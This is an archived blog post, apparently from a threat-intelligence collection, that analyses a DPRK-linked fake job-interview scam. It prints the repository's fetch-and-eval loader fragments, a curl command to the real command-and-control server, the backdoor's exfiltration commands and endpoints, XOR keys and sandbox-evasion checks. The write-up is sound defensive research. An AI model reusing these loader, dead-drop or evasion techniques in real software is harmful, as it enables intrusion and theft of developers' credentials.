{ "id": "876844df-f330-4abb-b4b1-43ba86985df3", "created_at": "2026-04-06T00:15:14.929365Z", "updated_at": "2026-04-10T13:13:04.822606Z", "deleted_at": null, "sha1_hash": "92b0c6c15f45346d730ce5b3b637fc63987040cc", "title": "How to Get Scammed (by DPRK Hackers)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5875057, "plain_text": "How to Get Scammed (by DPRK Hackers)\r\nBy OZ\r\nPublished: 2026-01-13 · Archived: 2026-04-05 22:42:56 UTC\r\n18 min read\r\nJan 13, 2026\r\nHello there,\r\nI am someone who is more than happy to accept your scam offer. For that, today we will discuss one of the scammer stories\r\nI have collected so far — a long journey involving malware that is said to be backed by DPRK threat actors.\r\nI won’t dive too deeply into tracing every single byte of the malware. Instead, I’ll link to researchers who have spent their\r\ntime doing exactly that (shoutout to them). What we will focus on is the approach: how we can actually detect if something\r\nis a scam, because let’s face it — as developers we can’t live in a bubble refusing to accept anything from anyone.\r\nHopefully, this will be both fun and useful.\r\nPress enter or click to view image in full size\r\nThis campaign is tracked under multiple names by security researchers:\r\n- **DEV#POPPER** (Securonix) — The social engineering delivery method: fake job interviews targeting developers\r\n- **XCTDH** — Cross-Chain TxDataHiding: the blockchain-based technique for hiding payloads and laundering stolen\r\ncrypto\r\n**Contagious Interview** (Mandiant/GTIG) — The broader DPRK operation this falls under\r\nWe will be looking into:\r\nThe scammer’s approach and social engineering tactics\r\nHow to safely analyze suspicious code\r\nThe malware itself (spoiler: blockchain as a dropper — yes, really)\r\nThe full kill chain from obfuscated JS to the final payload\r\nStory Mode: The Social Engineering\r\nThe First Contact\r\nOur friend goes by the name SuperStar0420 on Discord. Already a red flag if you ask me — who picks that as a\r\nprofessional handle? He was recruiting React developers as “Director of Engineering at SolidBit.”\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 1 of 21\n\nWhen he first reached out, his message landed in my spam folder. I didn’t notice it until the end of November when I was\r\ncleaning things up. Blackhat MEA was coming up and I thought: why not have some fun before the conference?\r\nOne thing worth mentioning: I found him in both a PHP language Discord server and “Hunt Town” — a crypto Discord\r\nserver. Crypto communities being used as hunting grounds? That’s red flag number one, FYI.\r\nThe “Legit” Company\r\nThe website he shared actually looks legit. It has content, an About page with team member names, the whole nine yards.\r\nThe founder listed is “Max Almudhafar” — remember this name, it comes up later.\r\nPress enter or click to view image in full size\r\nNow, if we didn’t already know this was a scam, this would be our first checkpoint. You’d want to:\r\nSearch for the names listed in the About section\r\nClick every button and check if social media accounts are real\r\nVerify if those accounts actually link back to this website\r\nBut here’s the thing — the website might not even be related to our guy. He could have just grabbed a random company link\r\nand impersonated someone there. That’s the beauty (and danger) of social engineering.\r\nThey even had LinkedIn and Facebook pages. Effort was put in.\r\nThe Job Post and the Pressure\r\nOur star also shared a Workable job post, which looked decent:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 2 of 21\n\nAlong the way, he insisted on picking me up regardless of how “bad” I was trying to be and said I don’t know React \u0026\r\nprogramming. That persistence? Another red flag. Legitimate recruiters don’t chase candidates who seem disinterested —\r\nthey have plenty of applicants.\r\nHe also shared a screenshot of an email supposedly from “Max” to his own email about the position, which was deleted later\r\non before I take a screenshot of it. This was odd. It made him look like another candidate trying to cheat the system, yet he\r\nwas simultaneously claiming to be the one hiring. This confusion is intentional — it creates just enough doubt for victims to\r\nmove forward with the process.\r\nLater, he shared the Github repository along with instructions to proceed. Here’s where he got impatient and sloppy. He was\r\nplaying the role well until this point, but suddenly started giving specific instructions that felt off-track for a legitimate\r\nrecruitment process.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 3 of 21\n\nHe deleted several messages afterward, including the Github repo link. We’ll circle back to discuss the scammer himself at\r\nthe end — first, let’s dig into the malware.\r\nThe Github Repository\r\nThe repository we received was: https://github.com/maxalmudhafar0210/react-technical-assessment\r\nAnd there it is — Max Almudhafar again, this time as the GitHub username. Whether this is the real founder’s name being\r\nabused or a persona the scammer created, the connection is clear.\r\nIt was removed later, but I got a local copy before it disappeared.\r\nAt the time it existed, there was one open issue and one pull request. The PR was interesting — it contained the push of the\r\nentire codebase that was already there. Seems like he didn’t know how to push properly at first. Unfortunately, I couldn’t\r\ncapture the username who created the PR, so I can’t confirm if it was a different account that could have led to another trail.\r\nThe open issue was from someone who came from Upwork — another victim who didn’t know it was a scam. The\r\nscammer’s Upwork account had been suspended, and this person opened a Github issue trying to reach out thinking it was a\r\nlegitimate process. I was able to explain the situation to them. Turns out they had actually executed the malware inside\r\ntheir Linux VM, I later on sent him an email after looking into the malware, however I am still waiting response from his\r\nend to see what happened with him. Lesson learned, I hope.\r\nRepository Structure\r\nLooking at the codebase, we have a typical-looking project:\r\nThe frontend contains an ASSESSMENT.md file—the \"technical exam\" instructions we're supposed to follow.\r\nI also checked the git logs and found an email address. Not sure if it’s actually related to the scammer or just some random\r\nvalue:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 4 of 21\n\nFinding the Malware: The Safe Way\r\nHere’s my general approach when analyzing Node.js codebases for malware:\r\n1. Look into the package.json file\r\n2. Look into the entrypoint files\r\n3. Execute in a containerized environment and observe what happens\r\nThe package.json looked clean. The server.js (the first thing executed when running yarn start ) also looked fine on\r\nquick review. Nothing suspicious—everything seemed okay, as if this wasn't a scam at all.\r\nBut here’s the thing: going through each file individually is not practical, and that’s exactly what the attacker is counting on.\r\nInstead of playing their game, I went straight to dynamic analysis.\r\nDocker + pspy: Trust Nothing, Observe Everything\r\nI spun up a Docker container and ran pspy (a process spy tool) inside it before doing anything else:\r\nPress enter or click to view image in full size\r\nWhy before npm install ? Because malicious packages can execute code during installation, dependency confusion\r\nattacks are real. I wanted to catch anything suspicious from the very first moment.\r\nUpon running yarn install , nothing happened. Good so far. But when I ran yarn start ... things got interesting.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 5 of 21\n\nI was doing this analysis weeks after receiving the malware (post-Blackhat), so I got a 404 error when it tried to reach out to\r\nits server. But that’s okay — I could see clearly that it was trying to contact express-project-ifm6fa.fly.dev . That's our\r\nscammer's staging server.\r\nAnd yes, I have a copy of what it would have returned — here’s the JSON response from that staging server:\r\nPress enter or click to view image in full size\r\nHunting Down the Trigger\r\nLooking at server.js , we have the following imports:\r\nimport express from 'express';\r\nimport cors from 'cors';\r\nimport dotenv from 'dotenv';\r\nimport { createRequire } from 'module';\r\nimport db from './config/database.js';\r\nimport { mockData } from './data/mockData.js';\r\nimport { errorHandler, notFound } from './middleware/errorHandler.js';\r\nimport authRoutes from './routes/authRoutes.js';\r\nimport productRoutes from './routes/productRoutes.js';\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 6 of 21\n\nimport categoryRoutes from './routes/categoryRoutes.js';\r\nimport orderRoutes from './routes/orderRoutes.js';\r\nimport reviewRoutes from './routes/reviewRoutes.js';\r\nimport cartRoutes from './routes/cartRoutes.js';\r\nTo narrow down where the malware lives, I did what any lazy (efficient) person would do: comment out everything and\r\nuncomment imports one by one until I find the culprit.\r\nLucky me — the malware was in the very first import I tested: database.js . My search didn't take long.\r\nPress enter or click to view image in full size\r\nThe Trigger: database.js\r\nInside database.js , there's a snippet that fetches data from an external URL. If that URL was still alive, it would return\r\nthis JSON:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 7 of 21\n\nSee that obfuscated JavaScript in the response? That’s the payload. The code reads data.data[6].description and then\r\nevals it. That's the trigger—executing arbitrary code fetched from an external server disguised as an innocent database\r\nconfiguration.\r\nPress enter or click to view image in full size\r\nReversing the JS Malware\r\nNow we skip the storytelling and dive into the malware itself. I used AI assistance to speed up the deobfuscation process —\r\nno shame in working smarter.\r\nBefore we get into the weeds, here’s the full kill chain we’re about to unpack:\r\nPress enter or click to view image in full size\r\nStage 1: LCG Obfuscation\r\nFirst, I ran the obfuscated code through an online JS deobfuscator, which made it easier for me to go through it even though\r\nI can’t understand all these loops and variables but at least I know where to add console.log to move on.\r\nglobal[\"!\"] = \"7-test\";\r\nvar _$_1d32 = function (x, w) {\r\n var d = x.length;\r\n var a = [];\r\n for (var o = 0; o \u003c d; o++) {\r\n a[o] = x.charAt(o);\r\n }\r\n for (var o = 0; o \u003c d; o++) {\r\n var z = w * (o + 370) + w % 42601;\r\n var l = w * (o + 409) + w % 35742;\r\n var j = z % d;\r\n var f = l % d;\r\n var h = a[j];\r\n a[j] = a[f];\r\n a[f] = h;\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 8 of 21\n\nw = (z + l) % 3217160;\r\n }\r\n \r\nThis is a Linear Congruential Generator (LCG) shuffling algorithm. It takes a string and a seed, then shuffles characters\r\naround using mathematical constants. Clever way to avoid standard Base64 signatures that security tools look for. How did I\r\nknow that this is LCG? I asked Gemini- I was: whatever, let it be just console.log the results\r\nTo extract the next stage payload, I added console.log statements everywhere and executed it inside Docker. Being lazy is\r\nsometimes the solution:\r\nPress enter or click to view image in full size\r\nSo the first step goes like: Obfuscated =\u003e Deobfuscated. And there it is — another payload.\r\nStage 2: The Dead Drop Resolver\r\nSame deobfuscation process with the new payload:\r\nvar _$_a2a4 = _$af26993(\"%%AVe!_e_d2errdr%o6%7dTtp...\", 5085621);\r\nfunction _$af26993(t, m) {\r\n var c = t.length;\r\n // ... dictionary-based reconstruction ...\r\n try {\r\n a = i[_$_a2a4[27]][_$_a2a4[26]]((await c(\r\n \"https://api.trongrid.io/v1/accounts/\" + t + _$_a2a4[24]\r\n ))[_$_a2a4[7]][0][_$_a2a4[23]][_$_a2a4[7]], _$_a2a4[25])\r\n // ... more obfuscation ...\r\n } catch (t) {\r\n a = (await c(\r\n \"https://fullnode.mainnet.aptoslabs.com/v1/accounts/\" + e + _$_a2a4[30]\r\n ))[0][_$_a2a4[29]][_$_a2a4[28]][0];\r\n }\r\nNow this is where it gets interesting. Rather than manually unpacking everything, I had Gemini generate debugging probes\r\nthat exposed the malware’s behavior in real-time.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 9 of 21\n\nWhat we found is a Dead Drop Resolver architecture. The malware doesn’t have hardcoded C2 server addresses. Instead,\r\nit:\r\n1. Queries specific Tron wallet addresses for “pointers”\r\n2. If Tron fails, falls back to Aptos blockchain\r\n3. Uses those pointers (transaction hashes) to fetch encrypted payloads from Binance Smart Chain\r\nThe cleartext wallet addresses in the code aren’t decoys — they’re a fully functional dual-channel command\r\ninfrastructure. If one blockchain gets blocked, the other takes over automatically.\r\nHere’s the key insight: the binary lacks any hardcoded payload locations. What it does have are high-entropy strings like\r\n2[gWfGj... which are hardcoded XOR decryption keys. The location of the payload is dynamic (fetched at runtime), but\r\nthe decryption capability is static.\r\nThis is clever. The attacker can rotate their hosting infrastructure endlessly without recompiling the malware.\r\nPress enter or click to view image in full size\r\nWallet Infrastructure\r\nThe malware queries these wallets with a filter like: /transactions?only_confirmed=true\u0026only_from=true\u0026limit=1\r\nThis fetches only the latest transaction sent from the wallet — which contains the pointer to the actual payload.\r\nTron Wallet TFMudZvWCw96CCKKHGaDTXFXropp9TUJwG Primary Signal (Stage 1)\r\nAptos Wallet 0x76bee1c28ff29d6c414e38a5c11d03facec7bef251aca9c484ddfeb59a06dc37 Backup Signal (Stage 1)\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 10 of 21\n\nTron Wallet TPx5Rw3d5ohacK22aYGYTWi5Jpzhyyo1Vp Primary Signal (Stage 2)\r\nAptos Wallet 0x4a5301c04974d149212b23a4f99c8e0e2bab458d93e4f47e65057a9d5ea26515 Backup Signal (Stage 2)\r\nPress enter or click to view image in full size\r\nAnd the backup one gives the same resulting payload\r\nPress enter or click to view image in full size\r\nStage 3: Fetching the Payload from Binance\r\nThe pointer extracted from Tron/Aptos is a transaction hash on Binance Smart Chain. The malware connects to a BSC\r\nRPC node and requests the Input Data of that transaction:\r\nPress enter or click to view image in full size\r\nThat hex-encoded data is the actual payload location:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 11 of 21\n\nWhen we look into Binance:\r\nPress enter or click to view image in full size\r\nThe payload itself is XOR-encrypted. Once decrypted, we get two execution paths:\r\n1. One payload executed via eval()\r\n2. Another spawned as a new node process (fileless execution)\r\nMy approach going through this is to add console.log() everywhere, and update the eval() input from being the\r\nprevious results to my own modified payload with console.log s, so it's actually executing my own payload that has the\r\nlast step commented until I replace it with the next code that I have extracted, along with the modified previous code for\r\ndebugging.\r\nStage 4: The Final Payload\r\nLooking at the eval’d payload (also available here):\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 12 of 21\n\nWe discover yet another layer with new wallet addresses:\r\nTron: TLmW5dMPTmtdgBKgKexc4uXZuvvEUU2DeF\r\nAptos: 0x7f66d0cf22f45f3cb39510dbef425b9728bea5159fe5c0a7a7d1f750ef2740bb\r\nThese point to: 0x828f00daa9fa68b36d2f2380f3fdc27265c53417ef01660b5421ea1125fad2de on Binance.\r\nPress enter or click to view image in full size\r\nThe final stage reaches out to an actual C2 server where things start:\r\ncurl -X GET \"http://23.27.120.142:27017/$/boot\" \\\r\n -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\" \\\r\n -H \"Connection: close\" \\\r\n \r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 13 of 21\n\nThis downloads an “ai engine” thing from GitHub which at first I thought was just a decoy to confuse analysts. I was\r\nalready annoyed by the amount of depth here and didn’t want to dig further.\r\nGet OZ’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nBut then I checked the Ransom-ISAC blog and found they went deeper — so I decided to take another look. I’d only\r\nanalyzed one of the two malware paths anyway. Time to see what both payloads actually do.\r\nThe Final Payloads: What They Actually Do\r\nI used AI to summarize the two final payloads (the one executed via eval() and the one spawned as a node process).\r\nBoth are part of the same campaign—they share XOR decryption keys and C2 infrastructure.\r\nPayload 1: Remote Access Trojan (RAT) / Backdoor\r\nIDE Persistence/Injection — This is nasty. It injects malicious code into:\r\nVS Code ( @vscode/deviceid/dist/index.js )\r\nCursor editor (same path pattern)\r\nUses markers /*C250617A*/ and /*C250618A*/ to track injected files\r\nC2 Communication — Connects via Socket.IO to 23.27.120.142:443\r\nRemote Command Execution — Supports multiple commands:\r\nss_info Exfiltrate system info (version, paths, session)\r\nss_ip Get victim\r\nss_upf Upload files to attacker\r\nss_upd Upload directories to attacker\r\nss_eval: Execute arbitrary JavaScript via eval()\r\nss_inz: Inject malware into a target file\r\nss_inzx: Remove injection from a file\r\n\u003cother\u003e Execute via child_process.exec()\r\nData Exfiltration — Uploads files to http://23.27.120.142:27017/u/f\r\nPayload 2: Dropper/Loader with Anti-Analysis\r\nEnvironment Fingerprinting — Collects hostname, username, platform, kernel version. Detects cloud environments\r\n(AWS, Azure, GCP, Vercel, Amplify) and CI/CD systems.\r\nSandbox/Analysis Evasion — Blocks execution in:\r\nAWS/Azure/GCP/Vercel cloud instances\r\nDocker containers (detects by hostname patterns like [0-9a-f]{12} )\r\nKali Linux (specifically blocks kali hostname with root / kali / shellchocolat users)\r\nCI/CD environments\r\nWSL2 on Linux\r\nCredential/Environment Exfiltration — Sends all environment variables to \u003cC2\u003e/snv\r\nSecond-Stage Payload Delivery:\r\nXOR-decrypted JavaScript (key: 4#uLeVM[3lESLGA ) spawned as detached Node process\r\nPython loader fetches additional payload from \u003cC2\u003e/$/\u003cid\u003e using XOR decryption (key: 9KyASt+7D0mjPHFY )\r\nAuto-installs Python if not present (downloads from C2 on Windows, installs pip on Linux)\r\nHow It Avoids Getting Caught\r\nThe sandbox detection is honestly impressive. They’re checking for:\r\nAWS Username ubuntu/runner/root + kernel contains -aws/.amzn\r\nAzure Username runner/codespace/azureuser + kernel contains -azure\r\nDocker Hostname matches /^[0-9a-f]{12}$/ (container ID pattern)\r\nKali Linux Hostname kali + user root/kali/shellchocolat\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 14 of 21\n\nCI/CD Hostname patterns like build-*, buildkitsandbox, 1a-cicd-*\r\nWSL2 Kernel contains microsoft-standard-WSL2\r\nThey also use a ReDoS-based debugger detection trick — if someone’s stepping through code with a debugger, the regex\r\ncatastrophically backtraces and hangs.\r\nThe Attack Chain\r\nHere’s how it all fits together:\r\nnpm install \u003cmalicious-package\u003e\r\n │\r\n ▼\r\n┌─────────────────────────────────────┐\r\n│ Loader/Dropper │\r\n│ • Fingerprints system │\r\n│ • Checks for sandbox │\r\n│ • Installs axios, socket.io-client │\r\n│ • Exfiltrates env vars to /snv │\r\n└─────────────────┬───────────────────┘\r\n │\r\n ┌─────────┴─────────┐\r\n ▼ ▼\r\n┌───────────────┐ ┌────────────────────┐\r\n│ XOR-decrypt │ │ Download Python │\r\n│ + spawn Node │ │ runtime if needed │\r\n│ payload │ └─────────┬──────────┘\r\n└───────┬───────┘ │\r\n │ ▼\r\n ▼ ┌────────────────────┐\r\n┌───────────────────┐ │ Fetch XOR-encrypted│\r\n│ RAT/Backdoor │ │ Python payload │\r\n│ • Socket.IO C2 │ │ from /$/\u003cid\u003e │\r\n│ • Inject VS Code │ └─────────┬──────────┘\r\n│ • Remote shell │ │\r\n│ • File exfil │ ▼\r\n└───────────────────┘ ┌────────────────────┐\r\n │ Execute decrypted │\r\n │ Python (stage 3) │\r\n └────────────────────┘\r\nIOCs from Final Payloads\r\nC2 Ports 443, 27017\r\nEndpoints /verify-human/, /snv, /u/f, /$/, /d/python.zip\r\nXOR Keys 4#uLeVM[3lESLGA, 9KyASt+7D0mjPHFY\r\nPersistence ~/.node_modules, VS Code/Cursor install paths\r\nFile Markers ,\r\nTL;DR — These are supply chain attack payloads that evade analysis environments, backdoor your IDE for persistence,\r\nestablish C2 via Socket.IO, steal your env vars, and drop a Python second-stage. Nasty stuff.\r\nThe “Triple-Chain” Architecture\r\nLet me break down why this infrastructure is so resilient:\r\nSignal (Primary) Tron TFMudZvWCw96CCKKHGaDTXFXropp9TUJwG Points to payl\r\nSignal (Backup) Aptos 0x76bee1c28ff29d6c414e38a5c11d03facec7bef251aca9c484ddfeb59a06dc37 Failover point\r\nSignal (Persist) Tron TPx5Rw3d5ohacK22aYGYTWi5Jpzhyyo1Vp Secondary pers\r\nPayload Host BSC 0xfc229556e244e8155b4c0d02a82239038211c29a33ceb46065e03b08dbde1bcb Hosts Encrypte\r\nPayload Host BSC 0x452ca1abcac0439c34b74f57b6d6e1ca90d4a7b22532347e4dc97a716b5e54e0 Hosts Encrypte\r\nThe beauty (from an attacker’s perspective) is that blockchain data is immutable. You can’t ask Binance to delete a\r\ntransaction. You can’t take down a Tron wallet. The infrastructure lives forever on public ledgers.\r\nA Note on the Obfuscation\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 15 of 21\n\nBoth Stage 1 and Stage 4 use LCG (Linear Congruential Generator) shuffling with different mathematical constants. I’ll\r\nbe honest — I didn’t bother reading through the algorithm manually. I let AI handle that part and just focused on extracting\r\nthe payloads. Sometimes the tool doesn’t matter as long as you get the job done.\r\nThe full debugging scripts I used are available here: https://gist.github.com/0x0OZ/46cc7e5c6c4a9c9dcc1cf95b30d780a8.\r\nBelieve me you don’t want to take a look at my garbish scripts\r\nThe Scammer: What We Know\r\nOur friend SuperStar0420 made some mistakes that exposed his identity — or at least gave us breadcrumbs to follow. Let’s\r\nsee what we can piece together.\r\nDiscord OSINT\r\nI’m currently blocked by him on Discord (guess I was too annoying — probably regretted trying to scam me). But before\r\nthat happened, we shared two mutual servers: Crypto Hunt and PHP DEVELOPERS, and later he joined one called\r\nCryptoDevs. I went through all his messages in these servers to understand him better.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 16 of 21\n\nWhat these messages tell us:\r\nOnly two messages in Hunt Town server from 2024 — looking for job offers with what seems like AI-generated skill\r\nlists (probably lies)\r\nThis suggests he was looking for legitimate work back then\r\nHe jumped into crypto communities later, likely when he started scamming (PHP DEVELOPERS messages are from\r\n2024, Hunt Town messages are from 2025)\r\nOne curious detail: in 2024 he was looking for a “male 20–34 not from India, Pakistan, Bangladesh” for some kind of\r\n“customization” work. That’s an oddly specific demographic filter. I wonder what that project actually was.\r\nTimeline of Scamming Operations\r\nWe also have messages from the C# Microsoft Discord server (which he’s no longer part of). These are dated June 8th,\r\n2025 — which likely marks around when he started running these scams:\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 17 of 21\n\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 18 of 21\n\nUsername Trail\r\nAnother mistake: his Discord username. He used SuperStar0420 and later changed it to masterdev0420. I searched for\r\nother accounts with this handle:\r\nhttps://www.answeroverflow.com/u/1128366871020834858\r\nhttps://forum.plutonium.pw/user/superstar0420\r\nThese were the only results that seemed connected to the same person. Running Sherlock turned up other accounts, but they\r\nappeared to be different people using the same username — common enough that it wasn’t useful.\r\nOne interesting lead: I found an Instagram account that might have been his. When I asked him about it on Discord, his\r\nresponse was… not helpful. You can probably guess why I got blocked shortly after.\r\nWhat made me suspicious? He changed his Discord username just a few days after I asked about that picture. Coincidence?\r\nMaybe. Maybe not.\r\nInfrastructure Investigation\r\nFor the scam infrastructure itself, searching for the C2 IP 23.27.120.142 turned up several articles and Twitter threads\r\nsharing this IOC. Other teams have done deeper analysis that I'll link below.\r\nI ran an nmap scan against the IP to see what’s exposed:\r\nPORT STATE SERVICE\r\n443/tcp open https\r\n3389/tcp open ms-wbt-server\r\n5985/tcp open wsman\r\n17500/tcp open db-lsp\r\n27017/tcp open mongod\r\nWhat we found:\r\nPort 443 HTTPS Everything returns 404—no interesting paths found\r\nPort 3389 RDP Hostname: EV-4A6OE6M0E2D (looks auto-generated)\r\nPort 5985 WinRM Windows Remote Management—interesting attack surface\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 19 of 21\n\nPort 17500 Dropbox LAN Sync Unusual to see this exposed\r\nPort 27017 HTTP Currently redirects /$/\u003cANYTHING\u003e to a GitHub raw file\r\nThe port 27017 redirect is curious — it points to:\r\nhttps://github.com/duanegoodner/xiangqigame/raw/refs/heads/main/prototypes/crtp_constructors/gist_crtp_constructors\r\nAccording to other researchers’ analysis, this GitHub account ( duanegoodner ) belongs to a non-real identity—likely a\r\nsock puppet account created by the threat actors. This suggests the repository isn't just a dead payload location, but\r\npotentially part of the next phase of the malware delivery chain. They're using GitHub as another layer of infrastructure,\r\nblending in with legitimate developer activity.\r\nThe Rotating Infrastructure\r\nThat random-looking RDP hostname — EV-4A6OE6M0E2D —caught my attention. I searched for it and found it appearing\r\nacross multiple IPs in various malware reports. This tells us something important: the servers rotate, but the hostname\r\nfingerprint persists.\r\nSourceLinkANY.RUNhttps://any.run/report/b1032815b078aad59eb3bd32c29dee4621b37e516e679e84cb7d1c11c3eaff15/1b2b6ce6-\r\n2922-47b0-b62a-8897b78704ebMalware.luhttps://app.malware.lu/sample/23.27.120.142_3389_EV-4A6OE6M0E2D_2025-\r\n12-11_12-21-08/FileScan.iohttps://www.filescan.io/uploads/68089ff790767142c3e16fc2/reports/13bdc659-5e29-4d45-ac06-\r\n10e3956cf148/stringsRansom-ISAC (Part 3)https://www.ransom-isac.com/blog/cross-chain-txdatahiding-crypto-heist-part-3/Hybrid Analysishttps://hybrid-analysis.com/sample/9f8033bf9e669aa8043f46733f73dd933ebe06eb4bbf7b3ccef3520bf4921598/682e5a350df522832307b738Shodan\r\n(23.27.13.242)https://www.shodan.io/host/23.27.13.242URLQueryhttp://urlquery.net/report/6656ec0f-b239-49d4-bb8e-0c6e2e4eef16Twitter (@skocherhan)https://x.com/skocherhan/status/1984034926006825127Twitter\r\n(@skocherhan)https://x.com/skocherhan/status/1978542223135576405Shodan\r\n(108.165.100.36)https://www.shodan.io/host/108.165.100.36\r\nThe pattern is clear: traditional C2 infrastructure (servers, IPs, hostnames) gets rotated regularly. The Tron wallet pointers\r\nalso rotate as they update their campaigns. But the Binance wallet — that stays the same. The payload itself gets updated\r\nfrom time to time (the oldest transaction I found was 322 days old), but because of how the dead drop architecture works,\r\nthey can push new malware versions to the same wallet address indefinitely. No hosting provider to file a takedown with. No\r\ndomain to seize. Just immutable blockchain data, forever.\r\nFurther Reading \u0026 Attribution\r\nThis is where my personal investigation ends. I didn’t look into blockchain tracing or attempt to follow the wallet\r\ntransactions — that’s a whole different level of headache and pain that I wasn’t willing to put myself through.\r\nHowever, I did reach out to the Ransom-ISAC team about the DPRK attribution claims. They broke down the evidence: the\r\nC2 addresses are dedicated IPs for DPRK infrastructure based in Vladivostok, the blockchain tracing intersects with wallets\r\nfrom DPRK-related campaigns like the Bybit hack, and the TxAddress technique matches what Mandiant/GTIG reported\r\non.\r\nThis campaign fits the “Contagious Interview” pattern — a known DPRK initial access vector. The playbook includes fake\r\njob interviews via LinkedIn/Telegram/Discord, poor AI-based filter camera interviews, and the obfuscation techniques we\r\nsaw in this malware. ISAC even shared a case where a victim reported the interviewer appeared as a White American,\r\nlooked like someone of African descent on camera, spoke with a Far-East accent, and logged in from a Vietnamese IP.\r\nClassic OpSec failures from this threat actor group.\r\nRecommended Deep Dives\r\nThe Ransom-ISAC team published a fantastic multi-part analysis covering the full kill chain, additional IOCs, and detection\r\nrules:\r\nCross-Chain TxDataHiding Crypto Heist (Part 1)\r\nCross-Chain TxDataHiding Crypto Heist (Part 2)\r\nCross-Chain TxDataHiding Crypto Heist (Part 3)\r\nCross-Chain TxDataHiding Crypto Heist (Part 4)\r\nAdditional Resources\r\nTypeLinkTwitter Threadhttps://x.com/skocherhan/status/1978530877467447667URLQuery\r\nReporthttps://www.urlquery.net/report/ddff21e3-12b5-4b12-9048-5c7cfe8c3a0fJoe Sandbox\r\nAnalysishttps://www.joesandbox.com/analysis/1796016/0/htmlMalva.re\r\nReporthttps://app.malva.re/file/64cc940af0ebea2626d156bdac505c3c/reportMalprob.iohttps://malprob.io/report/e792b1d0079c491c821137ef4695ec26f76\r\n(Cloudflare Tunnel)https://www.virustotal.com/gui/domain/cornwall-optimum-aviation-seekers.trycloudflare.com\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 20 of 21\n\nConclusion\r\nThis malware represents a modern evolution of botnet command-and-control. By abusing the immutable nature of public\r\nblockchains, the attacker ensures their payload cannot be deleted by hosting providers or law enforcement. Detection\r\nrequires either:\r\n1. Deep packet inspection of API calls to blockchain endpoints\r\n2. Host-based monitoring of process execution arguments\r\n3. Behavioral analysis watching for Node.js processes spawning with -e flags\r\nThe social engineering was decent but not perfect — the impatience gave it away. The technical infrastructure, however, was\r\ngenuinely impressive. Blockchain-based dead drops are becoming more common, and this “Triple-Chain” architecture\r\nshows how threat actors are evolving.\r\nAs for SuperStar0420? He’s still out there, probably with a new username by now, hunting in crypto Discord servers for his\r\nnext victim. The malware family is being actively tracked by multiple security teams, so hopefully the net is closing.\r\nStay paranoid, friends. And if someone on Discord offers you a “technical assessment” from a crypto-related server…\r\nmaybe think twice.\r\nSource: https://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 21 of 21\n\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76 \nPress enter or click to view image in full size\nPress enter or click to view image in full size\n Page 18 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76" ], "report_names": [ "how-to-get-scammed-by-dprk-hackers-b2f7588aea76" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], 